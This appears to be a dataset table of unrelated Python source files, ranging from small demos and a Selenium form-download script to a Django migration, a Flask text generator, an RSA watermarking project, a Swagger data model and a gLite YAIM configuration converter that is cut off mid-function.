text stringlengths 8 6.05M |
|---|
# Prints the proverb "All work and no play makes Jack a dull boy",
# one word per variable.
a = "All"
b = "work"
c = "and"
d = "no"
e = "play"
f = "makes"
g = "Jack"
h = "a"
i = "dull"
j = "boy"
# Joining with single spaces produces exactly what print(a, b, ...) would.
print(" ".join((a, b, c, d, e, f, g, h, i, j)))
# Demo: Python has built-in helpers (and the math module) for rounding
# numbers or taking remainders; round() is the simplest of them.
a = 541
b = 2
c = a / b  # true division -> 270.5
print(c)
# round() uses banker's rounding, so the .5 case goes to the nearest even int.
print(round(c))
# author:lyr time:2019-11-01
# Probe the ci.ytesting.com school-classes API and dump every interesting
# attribute of the response for manual inspection.
import requests

# NOTE(review): '<vode>' looks like an unfilled placeholder (possibly a typo
# for '<vcode>') -- a real verification code must be substituted before use.
rp = requests.get('http://ci.ytesting.com/api/3school/school_classes?'
                  'vcode=<vode>&action=list_classes_by_schoolgrade')
print(rp.status_code)  # HTTP status of the request
print(rp.url)          # final URL after any redirects
print(rp.text)         # body decoded as text
print(rp.content)      # raw body bytes
print(rp.headers)      # response headers
# Removed a stray bare expression `1111` that was dead code (evaluated and
# discarded with no effect).
|
import time
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import config
import environment
def get_options(download_path):
    """
    Build a ChromeOptions object for a headless chromedriver session.

    :param download_path: directory Chrome should place downloads into
    :return: a configured webdriver.ChromeOptions object
    """
    opts = webdriver.ChromeOptions()
    # Command-line switches: quiet logging, fixed window size, headless
    # operation, and a direct (proxy-free) connection.
    for switch in (
        "--log-level=3",
        "--window-size=1920,1080",
        "--disable-gpu",
        "--disable-extensions",
        "--proxy-server='direct://'",
        "--proxy-bypass-list=*",
        "--start-maximized",
        "--headless",
    ):
        opts.add_argument(switch)
    opts.add_experimental_option("useAutomationExtension", False)
    # Route file downloads into the requested directory.
    opts.add_experimental_option('prefs', {'download.default_directory': download_path})
    return opts
def extract(is_listener=False):
    """
    Download the latest bell-ringer (or, deprecated, listener) form export
    from askform.cn with a headless Chrome session.

    Logs in, navigates to the configured form and clicks the export button;
    the export lands in Data/ (or internal_testing_data/ when
    config.INTERNAL_TESTING is set) under its original name "数据列表.xls".

    :param is_listener: select the listener form instead of the bell-ringer
        form. Deprecated -- the listener link below is known to be wrong.
    :return: None
    """
    if is_listener:
        print("Running extract with is_listener = True should be deprecated!")
    script_dir = os.path.dirname(os.path.realpath(__file__)) #<-- absolute dir the script is in
    if config.INTERNAL_TESTING:
        data_abs_path = os.path.join(script_dir, "internal_testing_data/")
    else:
        data_abs_path = os.path.join(script_dir, "Data/")
    # Absolute XPaths for the askform.cn login page and form tree.  The
    # commented-out variants are older page layouts, kept for reference.
    # username_xpath = "/html/body/div[1]/div[1]/div/div[3]/div[2]/input"
    username_xpath = "/html/body/section/div/div[2]/div/form/div[1]/input"
    # pwd_xpath = "/html/body/div[1]/div[1]/div/div[4]/div/input"
    pwd_xpath = "/html/body/section/div/div[2]/div/form/div[2]/input"
    # login_button_xpath = ".//a[@onclick='askformLogin()']"
    login_button_xpath = "/html/body/section/div/div[2]/div/div[2]/a"
    form_menu_id = "menu4603080002"
    # bell_ringer_form_xpath = ".//a[@href='/Survey/DataList.aspx?AppConfigID=4603080002&FormApplicationID=10244540001&FormCategoryID=10276160001&FormID=14461000001']"
    # bell_ringer_form_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[3]/div/div[3]/ul/li[4]/a/span"
    bell_ringer_form_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[1]/div/div[3]/ul/li[4]/a/span"
    # bell_ringer_form_internal_test_xpath = ".//a[@href='/Survey/DataList.aspx?AppConfigID=4603080002&FormApplicationID=11631380001&FormCategoryID=11663020001&FormID=18367510001']"
    # bell_ringer_form_internal_test_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[4]/div/div[3]/ul/li[4]/a/span"
    bell_ringer_form_internal_test_xpath = "/html/body/form/div[4]/div/div/div[2]/div/div/div/div/div/div[2]/div[3]/div[1]/div/div[3]/ul/li[4]/a/span"
    download_button_id = "btnExport"
    # If a previous export already exists, delete it so the new download does
    # not get a " (1)"-style suffixed name.
    if os.path.exists(data_abs_path + "数据列表.xls"):
        os.remove(data_abs_path + "数据列表.xls")
    #form_extraction
    start = time.time()
    print("Starting browser...")
    print("data_abs_path: ", data_abs_path)
    # we can now start the browser and it will run headless
    browser = webdriver.Chrome(chrome_options=get_options(data_abs_path))
    print("Going to www.askform.cn/login ...")
    browser.set_page_load_timeout(600)
    browser.get("https://www.askform.cn/login")
    print("Loggin in...")
    try:
        # Credentials come from environment.ASKFORM_LOGIN = (user, password).
        element = WebDriverWait(browser, 20).until(
            EC.visibility_of_element_located((By.XPATH, username_xpath))
        )
        element.send_keys(environment.ASKFORM_LOGIN[0])
        element = WebDriverWait(browser, 20).until(
            EC.visibility_of_element_located((By.XPATH, pwd_xpath))
        )
        element.send_keys(environment.ASKFORM_LOGIN[1])
        element = WebDriverWait(browser, 20).until(
            EC.element_to_be_clickable((By.XPATH, login_button_xpath))
        )
        element.click()
        print("Looking for form...")
        # Open the "forms" menu entry.
        form_menu_xpath = "/html/body/form/div[4]/div/div/div[1]/div[1]/div/div[1]/ul/li[3]/a"
        element = WebDriverWait(browser, 20).until(
            EC.element_to_be_clickable((By.XPATH, form_menu_xpath))
        )
        element.click()
        # Select which form to download
        if config.INTERNAL_TESTING:
            element = WebDriverWait(browser, 20).until(
                EC.element_to_be_clickable((By.XPATH, bell_ringer_form_internal_test_xpath))
            )
            element.click()
        else:
            if is_listener:
                #this link in wrong!! Need to be changed in the future
                element = WebDriverWait(browser, 20).until(
                    EC.element_to_be_clickable((By.XPATH, ".//a[@href='/Survey/DataList.aspx?AppConfigID=4603080002&FormApplicationID=10801670001&FormCategoryID=10833290001&FormID=16128410001']"))
                )
                element.click()
            else:
                element = WebDriverWait(browser, 20).until(
                    EC.element_to_be_clickable((By.XPATH, bell_ringer_form_xpath))
                )
                element.click()
        print("Downloading...")
        element = WebDriverWait(browser, 20).until(
            EC.element_to_be_clickable((By.ID, download_button_id))
        )
        element.click()
        # NOTE(review): fixed 5s grace period for the download to finish --
        # large exports or a slow network could exceed this; confirm.
        time.sleep(5)
        browser.close()
    finally:
        # Always tear the browser process down, even on a timeout above.
        browser.quit()
    end = time.time()
    print("time: " + str(end - start))
def organize_form():
    """
    Rotate the downloaded form files: the previous newForm.xls becomes
    oldForm.xls (replacing any existing backup) and the freshly downloaded
    export ("数据列表.xls") becomes newForm.xls.

    :return: None
    :raises FileNotFoundError: if no fresh "数据列表.xls" export exists.
    """
    script_dir = os.path.dirname(os.path.realpath(__file__)) #<-- absolute dir the script is in
    if config.INTERNAL_TESTING:
        data_abs_path = os.path.join(script_dir, "internal_testing_data/")
    else:
        data_abs_path = os.path.join(script_dir, "Data/")
    # On the very first run oldForm.xls / newForm.xls do not exist yet, so
    # guard each rotation step instead of crashing with FileNotFoundError.
    if os.path.exists(data_abs_path + "oldForm.xls"):
        os.remove(data_abs_path + "oldForm.xls")
    if os.path.exists(data_abs_path + "newForm.xls"):
        os.rename(data_abs_path + "newForm.xls", data_abs_path + "oldForm.xls")
    os.rename(data_abs_path + "数据列表.xls", data_abs_path + "newForm.xls")
    print("Successfully organizes the forms!")
# Script entry point: initialise config with empty CLI-style arguments and
# run a (non-listener) bell-ringer form extraction.
if __name__ == '__main__':
    config.config(["",""])
    extract(is_listener = False)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-19 12:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: tightens the unique_together
    # constraints so an official identifier is unique per organisation type
    # within each start/end date, and an OrganisationGeography is unique per
    # organisation within each start/end date.

    dependencies = [("organisations", "0043_auto_20180607_1337")]

    operations = [
        migrations.AlterUniqueTogether(
            name="organisation",
            unique_together={
                ("official_identifier", "organisation_type", "start_date"),
                ("official_identifier", "organisation_type", "end_date"),
            },
        ),
        migrations.AlterUniqueTogether(
            name="organisationgeography",
            unique_together={
                ("organisation", "end_date"),
                ("organisation", "start_date"),
            },
        ),
    ]
|
from flask import Flask, render_template, request
import test  # local module providing ModelGenerator and generate_text

# Flask application serving the text-generation form.
app = Flask(__name__)
@app.route('/', methods = ["POST", "GET"])
def home():
    """Render the index page; on POST, generate text from the submitted seed.

    Form fields: "string" (seed text) and "NumChar" (number of characters to
    generate, defaulting to 1000 when left blank).
    """
    x = ""
    result = ""
    y = ""
    # NOTE(review): original indentation was lost in transit; generation is
    # assumed to run only on POST (a GET just renders an empty page) -- confirm.
    if request.method == "POST":
        x = request.form["string"]
        y = request.form["NumChar"]
        if not y:
            y = 1000  # default generation length when the field is blank
        else:
            y = int(y)
        m = test.ModelGenerator(str(x))
        m.transformer()
        result = test.generate_text(m.model, start_string=m.text, num_generate = y)
    return render_template("index.html", content = result)
# Run the Flask development server when executed directly.
if __name__=="__main__":
    app.run(debug = True)
|
'''
CS 6475
Final Project
Samuel Woo
Jassimran Kaur
'''
import numpy as np
import cv2
import hashlib
import Crypto
from Crypto.PublicKey import RSA
from Crypto import Random
from fp_functions import hash_file
from fp_functions import gen_RSA_keys
from fp_functions import sign_hash
from fp_functions import read_bits
from fp_functions import apply_watermark
from fp_functions import read_watermark
# Source image to watermark (Python 2 script).
FILE_NAME = 'WadiRum5.JPG'

if __name__ == '__main__':
    # Hash the image file and sign the hash with a fresh 1024-bit RSA key.
    image = cv2.imread(FILE_NAME)
    imageHash = hash_file(FILE_NAME)
    key = gen_RSA_keys(1024)
    signature = sign_hash(key, imageHash)
    # Embed the signature into the image as a watermark and save it
    # losslessly (PNG) so the embedded bits survive.
    watermarkedImage = apply_watermark(signature, image)
    cv2.imwrite("WatermarkedImage.png", watermarkedImage)
    # Round-trip: re-read the saved file, extract the watermark, and verify
    # it against the public half of the key pair.
    imageToBeRead = cv2.imread("WatermarkedImage.png")
    sigLength = read_bits(signature, 0)[1]
    watermark = read_watermark(imageToBeRead, sigLength)
    publicKey = key.publickey()
    if publicKey.verify(imageHash.digest(), watermark):
        cv2.imwrite('watermarkedImage.jpg', watermarkedImage)
        print 'Watermarked image saved to directory'
        print 'Watermark successfully applied and verified!'
    else:
        print 'Signature invalid'
|
import ast
def triangular(n):
    """Return the n-th triangular number, i.e. 1 + 2 + ... + n."""
    product = n * (n + 1)
    return product // 2
def main():
    """
    Project Euler 42-style count: print how many words in words.txt have a
    letter-value sum (A=1 .. Z=26) that is a triangular number.

    words.txt is expected to contain a Python literal list of uppercase words.
    """
    # Close the file deterministically (the original leaked the handle).
    with open("words.txt", "r") as file:
        contents = file.read()
    word_lst = sorted(ast.literal_eval(contents))
    # A set gives O(1) membership per word instead of scanning a list.
    triangular_set = {triangular(i) for i in range(1, 50)}
    counter = 0
    for word in word_lst:
        # ord-based A=1..Z=26 mapping; assumes words are uppercase A-Z
        # (matches the original hand-written alphabet list) -- TODO confirm.
        value = sum(ord(letter) - ord('A') + 1 for letter in word)
        if value in triangular_set:
            counter += 1
            # print(word)
    print(counter)
# Run the triangle-word count when executed directly.
if __name__=='__main__':
    main()
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ExposuresBundleSocioecon(Model):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    # Socioeconomic exposure record keyed by census geoid.  All fields are
    # typed str -- presumably because the upstream service serialises the
    # numeric estimates and their standard errors (*_se) as text; confirm
    # against the API spec before treating them as numbers.

    def __init__(self, geoid: str=None, est_total_pop: str=None, est_total_pop_se: str=None, est_total_pop25_plus: str=None, est_total_pop25_plus_se: str=None, est_prop_non_hisp_white: str=None, est_prop_non_hisp_white_se: str=None, est_prop_persons25_plus_high_school_max: str=None, est_prop_persons25_plus_high_school_max_se: str=None, est_prop_households_no_auto: str=None, est_prop_households_no_auto_se: str=None, est_prop_persons_no_health_ins: str=None, est_prop_persons_no_health_ins_se: str=None, est_prop_persons5_plus_no_english: str=None, est_prop_persons5_plus_no_english_se: str=None, median_household_income: str=None, median_household_income_se: str=None):  # noqa: E501
        """ExposuresBundleSocioecon - a model defined in Swagger

        Every parameter is an optional str carrying the like-named field of
        this record (population estimates, proportions, and their standard
        errors, plus the census geoid and median household income).
        """
        # Maps each attribute to its declared Swagger type.
        self.swagger_types = {
            'geoid': str,
            'est_total_pop': str,
            'est_total_pop_se': str,
            'est_total_pop25_plus': str,
            'est_total_pop25_plus_se': str,
            'est_prop_non_hisp_white': str,
            'est_prop_non_hisp_white_se': str,
            'est_prop_persons25_plus_high_school_max': str,
            'est_prop_persons25_plus_high_school_max_se': str,
            'est_prop_households_no_auto': str,
            'est_prop_households_no_auto_se': str,
            'est_prop_persons_no_health_ins': str,
            'est_prop_persons_no_health_ins_se': str,
            'est_prop_persons5_plus_no_english': str,
            'est_prop_persons5_plus_no_english_se': str,
            'median_household_income': str,
            'median_household_income_se': str
        }
        # Maps each attribute to its wire (JSON) field name.
        self.attribute_map = {
            'geoid': 'geoid',
            'est_total_pop': 'EstTotalPop',
            'est_total_pop_se': 'EstTotalPop_SE',
            'est_total_pop25_plus': 'EstTotalPop25Plus',
            'est_total_pop25_plus_se': 'EstTotalPop25Plus_SE',
            'est_prop_non_hisp_white': 'EstPropNonHispWhite',
            'est_prop_non_hisp_white_se': 'EstPropNonHispWhite_SE',
            'est_prop_persons25_plus_high_school_max': 'EstPropPersons25PlusHighSchoolMax',
            'est_prop_persons25_plus_high_school_max_se': 'EstPropPersons25PlusHighSchoolMax_SE',
            'est_prop_households_no_auto': 'EstPropHouseholdsNoAuto',
            'est_prop_households_no_auto_se': 'EstPropHouseholdsNoAuto_SE',
            'est_prop_persons_no_health_ins': 'EstPropPersonsNoHealthIns',
            'est_prop_persons_no_health_ins_se': 'EstPropPersonsNoHealthIns_SE',
            'est_prop_persons5_plus_no_english': 'EstPropPersons5PlusNoEnglish',
            'est_prop_persons5_plus_no_english_se': 'EstPropPersons5PlusNoEnglish_SE',
            'median_household_income': 'MedianHouseholdIncome',
            'median_household_income_se': 'MedianHouseholdIncome_SE'
        }
        self._geoid = geoid
        self._est_total_pop = est_total_pop
        self._est_total_pop_se = est_total_pop_se
        self._est_total_pop25_plus = est_total_pop25_plus
        self._est_total_pop25_plus_se = est_total_pop25_plus_se
        self._est_prop_non_hisp_white = est_prop_non_hisp_white
        self._est_prop_non_hisp_white_se = est_prop_non_hisp_white_se
        self._est_prop_persons25_plus_high_school_max = est_prop_persons25_plus_high_school_max
        self._est_prop_persons25_plus_high_school_max_se = est_prop_persons25_plus_high_school_max_se
        self._est_prop_households_no_auto = est_prop_households_no_auto
        self._est_prop_households_no_auto_se = est_prop_households_no_auto_se
        self._est_prop_persons_no_health_ins = est_prop_persons_no_health_ins
        self._est_prop_persons_no_health_ins_se = est_prop_persons_no_health_ins_se
        self._est_prop_persons5_plus_no_english = est_prop_persons5_plus_no_english
        self._est_prop_persons5_plus_no_english_se = est_prop_persons5_plus_no_english_se
        self._median_household_income = median_household_income
        self._median_household_income_se = median_household_income_se

    @classmethod
    def from_dict(cls, dikt) -> 'ExposuresBundleSocioecon':
        """Build an ExposuresBundleSocioecon from a plain dict.

        :param dikt: A dict keyed by wire field names (see attribute_map).
        :rtype: ExposuresBundleSocioecon
        """
        return util.deserialize_model(dikt, cls)

    @property
    def geoid(self) -> str:
        """Gets the geoid of this ExposuresBundleSocioecon."""
        return self._geoid

    @geoid.setter
    def geoid(self, geoid: str):
        """Sets the geoid of this ExposuresBundleSocioecon."""
        self._geoid = geoid

    @property
    def est_total_pop(self) -> str:
        """Gets the est_total_pop of this ExposuresBundleSocioecon."""
        return self._est_total_pop

    @est_total_pop.setter
    def est_total_pop(self, est_total_pop: str):
        """Sets the est_total_pop of this ExposuresBundleSocioecon."""
        self._est_total_pop = est_total_pop

    @property
    def est_total_pop_se(self) -> str:
        """Gets the est_total_pop_se of this ExposuresBundleSocioecon."""
        return self._est_total_pop_se

    @est_total_pop_se.setter
    def est_total_pop_se(self, est_total_pop_se: str):
        """Sets the est_total_pop_se of this ExposuresBundleSocioecon."""
        self._est_total_pop_se = est_total_pop_se

    @property
    def est_total_pop25_plus(self) -> str:
        """Gets the est_total_pop25_plus of this ExposuresBundleSocioecon."""
        return self._est_total_pop25_plus

    @est_total_pop25_plus.setter
    def est_total_pop25_plus(self, est_total_pop25_plus: str):
        """Sets the est_total_pop25_plus of this ExposuresBundleSocioecon."""
        self._est_total_pop25_plus = est_total_pop25_plus

    @property
    def est_total_pop25_plus_se(self) -> str:
        """Gets the est_total_pop25_plus_se of this ExposuresBundleSocioecon."""
        return self._est_total_pop25_plus_se

    @est_total_pop25_plus_se.setter
    def est_total_pop25_plus_se(self, est_total_pop25_plus_se: str):
        """Sets the est_total_pop25_plus_se of this ExposuresBundleSocioecon."""
        self._est_total_pop25_plus_se = est_total_pop25_plus_se

    @property
    def est_prop_non_hisp_white(self) -> str:
        """Gets the est_prop_non_hisp_white of this ExposuresBundleSocioecon."""
        return self._est_prop_non_hisp_white

    @est_prop_non_hisp_white.setter
    def est_prop_non_hisp_white(self, est_prop_non_hisp_white: str):
        """Sets the est_prop_non_hisp_white of this ExposuresBundleSocioecon."""
        self._est_prop_non_hisp_white = est_prop_non_hisp_white

    @property
    def est_prop_non_hisp_white_se(self) -> str:
        """Gets the est_prop_non_hisp_white_se of this ExposuresBundleSocioecon."""
        return self._est_prop_non_hisp_white_se

    @est_prop_non_hisp_white_se.setter
    def est_prop_non_hisp_white_se(self, est_prop_non_hisp_white_se: str):
        """Sets the est_prop_non_hisp_white_se of this ExposuresBundleSocioecon."""
        self._est_prop_non_hisp_white_se = est_prop_non_hisp_white_se

    @property
    def est_prop_persons25_plus_high_school_max(self) -> str:
        """Gets the est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon."""
        return self._est_prop_persons25_plus_high_school_max

    @est_prop_persons25_plus_high_school_max.setter
    def est_prop_persons25_plus_high_school_max(self, est_prop_persons25_plus_high_school_max: str):
        """Sets the est_prop_persons25_plus_high_school_max of this ExposuresBundleSocioecon."""
        self._est_prop_persons25_plus_high_school_max = est_prop_persons25_plus_high_school_max

    @property
    def est_prop_persons25_plus_high_school_max_se(self) -> str:
        """Gets the est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon."""
        return self._est_prop_persons25_plus_high_school_max_se

    @est_prop_persons25_plus_high_school_max_se.setter
    def est_prop_persons25_plus_high_school_max_se(self, est_prop_persons25_plus_high_school_max_se: str):
        """Sets the est_prop_persons25_plus_high_school_max_se of this ExposuresBundleSocioecon."""
        self._est_prop_persons25_plus_high_school_max_se = est_prop_persons25_plus_high_school_max_se

    @property
    def est_prop_households_no_auto(self) -> str:
        """Gets the est_prop_households_no_auto of this ExposuresBundleSocioecon."""
        return self._est_prop_households_no_auto

    @est_prop_households_no_auto.setter
    def est_prop_households_no_auto(self, est_prop_households_no_auto: str):
        """Sets the est_prop_households_no_auto of this ExposuresBundleSocioecon."""
        self._est_prop_households_no_auto = est_prop_households_no_auto

    @property
    def est_prop_households_no_auto_se(self) -> str:
        """Gets the est_prop_households_no_auto_se of this ExposuresBundleSocioecon."""
        return self._est_prop_households_no_auto_se

    @est_prop_households_no_auto_se.setter
    def est_prop_households_no_auto_se(self, est_prop_households_no_auto_se: str):
        """Sets the est_prop_households_no_auto_se of this ExposuresBundleSocioecon."""
        self._est_prop_households_no_auto_se = est_prop_households_no_auto_se

    @property
    def est_prop_persons_no_health_ins(self) -> str:
        """Gets the est_prop_persons_no_health_ins of this ExposuresBundleSocioecon."""
        return self._est_prop_persons_no_health_ins

    @est_prop_persons_no_health_ins.setter
    def est_prop_persons_no_health_ins(self, est_prop_persons_no_health_ins: str):
        """Sets the est_prop_persons_no_health_ins of this ExposuresBundleSocioecon."""
        self._est_prop_persons_no_health_ins = est_prop_persons_no_health_ins

    @property
    def est_prop_persons_no_health_ins_se(self) -> str:
        """Gets the est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon."""
        return self._est_prop_persons_no_health_ins_se

    @est_prop_persons_no_health_ins_se.setter
    def est_prop_persons_no_health_ins_se(self, est_prop_persons_no_health_ins_se: str):
        """Sets the est_prop_persons_no_health_ins_se of this ExposuresBundleSocioecon."""
        self._est_prop_persons_no_health_ins_se = est_prop_persons_no_health_ins_se

    @property
    def est_prop_persons5_plus_no_english(self) -> str:
        """Gets the est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon."""
        return self._est_prop_persons5_plus_no_english

    @est_prop_persons5_plus_no_english.setter
    def est_prop_persons5_plus_no_english(self, est_prop_persons5_plus_no_english: str):
        """Sets the est_prop_persons5_plus_no_english of this ExposuresBundleSocioecon."""
        self._est_prop_persons5_plus_no_english = est_prop_persons5_plus_no_english

    @property
    def est_prop_persons5_plus_no_english_se(self) -> str:
        """Gets the est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon."""
        return self._est_prop_persons5_plus_no_english_se

    @est_prop_persons5_plus_no_english_se.setter
    def est_prop_persons5_plus_no_english_se(self, est_prop_persons5_plus_no_english_se: str):
        """Sets the est_prop_persons5_plus_no_english_se of this ExposuresBundleSocioecon."""
        self._est_prop_persons5_plus_no_english_se = est_prop_persons5_plus_no_english_se

    @property
    def median_household_income(self) -> str:
        """Gets the median_household_income of this ExposuresBundleSocioecon."""
        return self._median_household_income

    @median_household_income.setter
    def median_household_income(self, median_household_income: str):
        """Sets the median_household_income of this ExposuresBundleSocioecon."""
        self._median_household_income = median_household_income

    @property
    def median_household_income_se(self) -> str:
        """Gets the median_household_income_se of this ExposuresBundleSocioecon."""
        return self._median_household_income_se

    @median_household_income_se.setter
    def median_household_income_se(self, median_household_income_se: str):
        """Sets the median_household_income_se of this ExposuresBundleSocioecon."""
        self._median_household_income_se = median_household_income_se
|
################################################################################
#
# Copyright (c) Members of the EGEE Collaboration. 2004.
# See http://eu-egee.org/partners/ for details on the copyright holders.
# For license conditions see the license file or http://eu-egee.org/license.html
#
################################################################################
import os
import re
import sys
import getopt
import shutil
import xmlUtils
from xml.dom.minidom import Node
from xml.dom.minidom import parse, parseString
from xmlUtils import gliteXMLWriter
from xmlUtils import UltraPrettyPrint
from xmlUtils import GliteUIsetParams
global vo, map, defaults, yaim_file, environ
def isGliteScalar(node):
    """Return True when *node* is a scalar gLite parameter (no child nodes)."""
    has_children = node.hasChildNodes()
    return not has_children
def isArray(value):
    """A YAIM value is treated as an array when it contains any quote char."""
    return ('"' in value) or ("'" in value)
def updateArrayParameter( node, value, yaimParam, description = '' ):
    # Replace the <value/> children of an array-style gLite parameter node
    # with the items parsed from a YAIM value string (quoted, space-separated).
    # Falls through to updateParamNode() when the node is actually a scalar.
    # Python 2 code (print statement, xrange).
    if not value.strip() == '':
        externQuote = value.strip()[0]
        if externQuote in ('"',"'"):
            quoteCount = value.count( externQuote )
            splitChar = externQuote
            if quoteCount % 2 > 0:
                # Unbalanced quoting -- warn but continue splitting on the quote.
                print "possible problems: odd number of quotes found"
            elif quoteCount == 2:
                # A single fully-quoted string: drop the quotes, split on spaces.
                value = value.strip( externQuote )
                splitChar = ' '
        else:
            splitChar = ' '
            #value = value.strip( externQuote )
        # parse array items from value
        itemValues = value.split( splitChar )
    else:
        itemValues = []
    # cleanup of empty entries
    if isGliteScalar( node ):
        # NOTE(review): empty input yields itemValues == [] and this indexing
        # would raise IndexError -- presumably never hit in practice; confirm.
        updateParamNode( node, itemValues[0], yaimParam, description )
    else:
        # Drop entries that are empty once quotes/whitespace are stripped
        # (iterating backwards so removal is safe).
        for i in range( len( itemValues ) - 1, -1, -1 ):
            if stripQuotes( itemValues[i] ) == '':
                itemValues.remove( itemValues[i] )
        # remove all existing values from array
        for child in range( len( node.childNodes ) - 1, -1, -1 ):
            node.removeChild( node.childNodes[child] )
        if description == '':
            description = 'Parameter defined in %s by YAIM parameter %s'\
                % ( yaim_file, yaimParam )
        node.setAttribute( 'description', description )
        # Add special treatement for SE_LIST: each SE host is expanded to
        # "'.' <host> <storage dir>", with /tmp as the fallback directory.
        itemValues1 = []
        if yaimParam == 'SE_LIST':
            # for item in itemValues:
            #     itemValues1.append( "'.' %s /tmp" % item )
            for item in xrange( len( itemValues ) ):
                try:
                    itemValues1.append( "'.' %s %s" % ( itemValues[item], \
                        stripQuotes( replaceParameter( environ['CLASSIC_STORAGE_DIR'] )\
                        .split( ' ' )[item] ) ) )
                except:
                    # Any lookup/index failure falls back to /tmp for this SE.
                    itemValues1.append( "'.' %s /tmp" % itemValues[item] )
            itemValues = itemValues1
        # add new items to array (at least one, possibly empty, <value/>)
        if len( itemValues ) == 0:
            itemValues = ['']
        for value in itemValues:
            newDoc = parseString( '<value/>' )
            newItem = newDoc.documentElement
            if not value.strip() == '':
                newItem.appendChild( newDoc.createTextNode( value.strip() ) )
            node.appendChild( newItem )
def multiSplit(string, split):
    """Split *string* at every character found in *split*.

    All pieces except the last are returned verbatim; the trailing piece is
    passed through stripQuotes() before being appended.
    """
    pieces = []
    segment_start = 0
    for index, char in enumerate(string):
        if char in split:
            pieces.append(string[segment_start:index])
            segment_start = index + 1
    pieces.append(stripQuotes(string[segment_start:]))
    return pieces
def replaceParameter( value ):
    # Recursively expand ${VAR} and $VAR references in *value* from the
    # global `environ` mapping.  Unknown names are collected in `ignore` so
    # the loop terminates once every remaining '$' belongs to an unresolvable
    # reference.  Python 2 code (dict.has_key).
    ignore = []
    while not value.count( '$' ) == len( ignore ):
        if value.find( '${' ) > -1:
            # Braced form: take everything between '${' and the next '}'.
            start = value.find( '${' )
            stop = value.find( '}' )
            parameter = value[ start : stop + 1 ]
            if not parameter[2:-1] in ignore:
                if environ.has_key( parameter[2:-1] ):
                    value = value.replace( parameter, stripQuotes( environ[parameter[2:-1]] ) )
                else:
                    ignore.append( parameter[2:-1] )
        elif value.find( '$' ) > -1:
            # Bare form: the name runs until the next '/', ':' or space.
            tmp = value[value.find( '$' ):].strip()
            parameter = multiSplit( tmp, '/: ' )[0]
            if not parameter[1:] in ignore:
                if environ.has_key( parameter[1:] ):
                    value = value.replace( parameter, stripQuotes( environ[parameter[1:]] ) )
                else:
                    ignore.append( parameter[1:] )
    return value
def updateParamNode( node, value, yaimParam, description = '' ):
    # Write a (parameter-expanded) YAIM value onto a gLite parameter node:
    # scalars become a 'value' attribute, arrays are delegated to
    # updateArrayParameter(); the node's 'description' records provenance.
    # if isArray(value) == isGliteArray(node):
    value = replaceParameter( value )
    if isGliteScalar( node ):
        valueNodes = node.getElementsByTagName( 'value' )
        if len( valueNodes ) == 0:
            node.setAttribute( 'value', value )
        else:
            # NOTE(review): a scalar node has no children, so this branch
            # looks unreachable -- presumably defensive; confirm.
            updateArrayParameter( node, "'%s'" % value, yaimParam, description )
    else:
        updateArrayParameter( node, value, yaimParam, description )
    if description == '':
        node.setAttribute( 'description', 'Parameter defined in %s by YAIM parameter %s'\
            % ( yaim_file, yaimParam ) )
    else:
        node.setAttribute( 'description', description )
def mapYaim2gLite(param):
    """Translate a YAIM parameter name via the global `map` dict.

    Unmapped names pass through as a single-item list of the name itself.
    """
    fallback = [param]
    return map.get(param, fallback)
def createContainer(tag, name):
    """Create an empty container element <tag name='name'><parameters/></tag>.

    Both the tag and the name are lowercased before building the element.
    """
    lowered_tag = tag.lower()
    snippet = "<%s name='%s'><parameters/></%s>" \
        %( lowered_tag, name.lower(), lowered_tag )
    document = parseString(snippet)
    return document.documentElement
def createParameter( voName, value, yaimParam ):
    # Append one freshly-built parameter element per mapped gLite name under
    # the given VO's <parameters> container (global `vo` registry).
    for param in mapYaim2gLite( yaimParam ):
        paramNode=parseString( "<%s/>" % param ).documentElement
        updateParamNode( paramNode, value, yaimParam )
        vo[voName].getElementsByTagName( 'parameters' )[0].appendChild( paramNode )
def stripQuotes(param):
    """Strip surrounding double quotes, then single quotes, then whitespace."""
    unquoted = param.strip('"')
    unquoted = unquoted.strip("'")
    return unquoted.strip()
def getPoolName( vo ):
    # Look up the given VO in the USERS_CONF file (colon-separated lines:
    # uid:account:gid:group:vo:...) and return the first matching
    # ( <pool account name>, <pool group> ); ('', '') when not found.
    user = ( '', '' )
    users = open( replaceParameter( environ['USERS_CONF'] ) ).readlines()
    for line in users:
        line = line.strip()
        # Skip blank lines and '#' comments.
        if not line == '' and not line[0] == '#':
            if line.split( ':' )[4].lower() == vo.lower():
                # user = ( <first pool account name>, <pool group>)
                user = ( line.split( ':' )[1], line.split( ':' )[3] )
                break
    return user
def updateContainerParameter( yaimName, value ):
    """Create or update a per-VO gLite parameter from a YAIM VO_* name.

    yaimName has the form VO_<voname>_<PARAM>; a new VO container is
    created (with default pool-account parameters) the first time a VO
    is seen.  VOMSES values are split into their individual gLite
    parameters; everything else goes through the YAIM->gLite name map.
    """
    ( tag, tagName, param ) = yaimName.split( '_', 2 )
    tagName = tagName.lower()
    # ToDo: Put case insensitive check on the VO name
    if tagName in stripQuotes( environ['VOS'].lower() ).split():
        if not vo.has_key( tagName ):
            vo[tagName] = xmlUtils.getContainerTemplate( 'vo-template' )
            vo[tagName].setAttribute( 'name', tagName )
            # create default VO parameter structure
            # default: pool account creation disabled
            ( name, group ) = getPoolName ( tagName )
            # Strip the trailing account counter, e.g. 'atlas001' -> 'atlas'.
            base = name.rstrip( '0123456789' )
            createParameter( tagName, base, 'pool.account.basename' )
            createParameter( tagName, group, 'pool.account.group' )
